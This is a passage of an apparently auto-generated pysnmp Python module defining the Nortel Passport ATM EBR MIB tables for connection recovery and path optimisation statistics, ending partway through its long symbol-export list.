mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 20, 12, 30))
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 20, 12, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(
subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(
subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(
subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 20, 12, 40))
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 20, 12, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1,
4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))
mscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 96, 7, 1))
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 96, 7, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrComponentName.setStatus('mandatory')
mscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStorageType.setStatus('mandatory')
mscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
96, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfPnniEbrIndex.setStatus('mandatory')
mscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
96, 7, 20))
if mibBuilder.loadTexts:
mscAtmIfPnniEbrProvTable.setStatus('mandatory')
mscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 96, 7, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')
mscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
96, 7, 30))
if mibBuilder.loadTexts:
mscAtmIfPnniEbrOperTable.setStatus('mandatory')
mscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 96, 7, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
96, 7, 40))
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 96, 7, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')
atmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))
atmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1))
atmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3)
)
atmEbrGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1,
1, 3, 2))
atmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))
atmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159,
3, 1))
atmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2,
159, 3, 1, 3))
atmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2,
159, 3, 1, 3, 2))
mibBuilder.exportSymbols('Nortel-MsCarrier-MscPassport-AtmEbrMIB',
mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA,
mscAtmIfUniEbrTotalConnectionRecoveries=
mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=
mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=
mscAtmIfVptPnniEbrProvEntry,
mscAtmIfVptVccEbrInfoTotalPathOptimizations=
mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=
mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=
mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup,
mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery,
mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry,
mscAtmIfVptUniEbrTotalPathOptimizations=
mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=
mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr,
mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization,
mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry,
mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType,
mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus,
mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable,
mscAtmIfVptPnniEbrSubscribedConnections=
mscAtmIfVptPnniEbrSubscribedConnections,
mscAtmIfVccEbrInfoTotalPathOptimizations=
mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=
mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=
mscAtmIfVptUniEbrProvEntry,
mscAtmIfVptPnniEbrEligibleRecoveredConnections=
mscAtmIfVptPnniEbrEligibleRecoveredConnections,
mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName,
mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry,
mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex,
mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType,
mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable,
mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization,
mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry,
mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry,
mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType,
mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry,
mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex,
mscAtmIfPnniEbrTotalConnectionRecoveries=
mscAtmIfPnniEbrTotalConnectionRecoveries,
mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable,
mscAtmIfPnniEbrEligibleRecoveredConnections=
mscAtmIfPnniEbrEligibleRecoveredConnections,
mscAtmIfVpcEbrInfoRecoverySubscribed=
mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=
mscAtmIfVptVccSrcEbrOvProvTable,
mscAtmIfVptVccEbrInfoConnectionRecovered=
mscAtmIfVptVccEbrInfoConnectionRecovered,
mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName,
mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName,
mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry,
mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName,
mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry,
mscAtmIfVptIispEbrTotalPathOptimizations=
mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=
mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex,
mscAtmIfVptUniEbrIneligibleRecoveredConnections=
mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02
=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=
mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=
mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=
mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=
mscAtmIfVpcSrcEbrOvOptimizationSubscribed,
mscAtmIfIispEbrTotalPathOptimizations=
mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName
=mscAtmIfVccSrcEbrOvComponentName,
mscAtmIfVccSrcEbrOvOptimizationSubscribed=
mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=
mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=
mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=
mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=
mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=
mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=
mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=
mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=
mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=
mscAtmIfIispEbrRowStatusEntry,
mscAtmIfVptIispEbrIneligibleRecoveredConnections=
mscAtmIfVptIispEbrIneligibleRecoveredConnections,
atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A,
mscAtmIfVptVccEbrInfoOptimizationSubscribed=
mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=
mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=
mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=
mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=
mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=
mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=
mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=
mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=
mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=
mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=
mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=
mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=
mscAtmIfPnniEbrIneligibleRecoveredConnections,
mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable,
mscAtmIfVptPnniEbrIneligibleRecoveredConnections=
mscAtmIfVptPnniEbrIneligibleRecoveredConnections,
mscAtmIfVpcEbrInfoConnectionRecovered=
mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=
mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=
mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=
mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations
=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=
mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=
mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=
mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=
mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=
mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex,
mscAtmIfVptUniEbrTotalConnectionRecoveries=
mscAtmIfVptUniEbrTotalConnectionRecoveries,
mscAtmIfVpcEbrInfoTotalConnectionRecoveries=
mscAtmIfVpcEbrInfoTotalConnectionRecoveries,
mscAtmIfVptVccSrcEbrOvRowStatusEntry=
mscAtmIfVptVccSrcEbrOvRowStatusEntry,
mscAtmIfIispEbrTotalConnectionRecoveries=
mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=
mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=
mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=
mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=
mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=
mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=
mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=
mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=
mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=
mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=
mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=
mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=
mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=
mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=
mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry
=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=
mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=
mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=
mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=
mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=
mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=
mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=
mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr,
mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry,
mscAtmIfVptPnniEbrTotalConnectionRecoveries=
mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=
mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=
mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=
mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=
mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=
mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=
mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=
mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=
mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=
mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=
mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=
mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=
mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=
mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=
mscAtmIfVptVccSrcEbrOvComponentName,
mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery,
mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType,
mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv,
mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable,
mscAtmIfUniEbrEligibleRecoveredConnections=
mscAtmIfUniEbrEligibleRecoveredConnections,
mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry,
mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus,
mscAtmIfIispEbrEligibleRecoveredConnections=
mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=
mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=
mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=
mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=
mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=
mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=
mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=
mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=
mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=
mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=
mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=
mscAtmIfPnniEbrConnectionRecovery,
mscAtmIfVccEbrInfoConnectionRecovered=
mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=
mscAtmIfVccEbrInfoStatsEntry,
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries,
mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType,
mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry,
mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable,
mscAtmIfVccSrcEbrOvRecoverySubscribed=
mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=
atmEbrCapabilities, mscAtmIfUniEbrComponentName=
mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=
mscAtmIfPnniEbrTotalPathOptimizations,
mscAtmIfUniEbrIneligibleRecoveredConnections=
mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=
mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=
mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=
mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=
mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=
mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=
mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=
mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=
mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A,
mscAtmIfVccEbrInfoOptimizationSubscribed=
mscAtmIfVccEbrInfoOptimizationSubscribed,
mscAtmIfVptVccSrcEbrOvRowStatusTable=
mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB,
mscAtmIfVptVccEbrInfoRecoverySubscribed=
mscAtmIfVptVccEbrInfoRecoverySubscribed,
mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry,
mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus,
mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry,
mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType,
mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry,
mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable,
mscAtmIfIispEbrIneligibleRecoveredConnections=
mscAtmIfIispEbrIneligibleRecoveredConnections,
mscAtmIfVptIispEbrConnectionRecovery=
mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=
mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02,
mscAtmIfVptIispEbrTotalConnectionRecoveries=
mscAtmIfVptIispEbrTotalConnectionRecoveries,
mscAtmIfUniEbrTotalPathOptimizations=
mscAtmIfUniEbrTotalPathOptimizations,
mscAtmIfVpcSrcEbrOvRecoverySubscribed=
mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=
mscAtmIfVptPnniEbrOperTable,
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed,
mscAtmIfVptUniEbrEligibleRecoveredConnections=
mscAtmIfVptUniEbrEligibleRecoveredConnections,
mscAtmIfVpcEbrInfoOptimizationSubscribed=
mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=
mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=
mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=
mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=
mscAtmIfVptVccSrcEbrOvStorageType,
mscAtmIfVptPnniEbrTotalPathOptimizations=
mscAtmIfVptPnniEbrTotalPathOptimizations,
mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName,
mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName,
mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry,
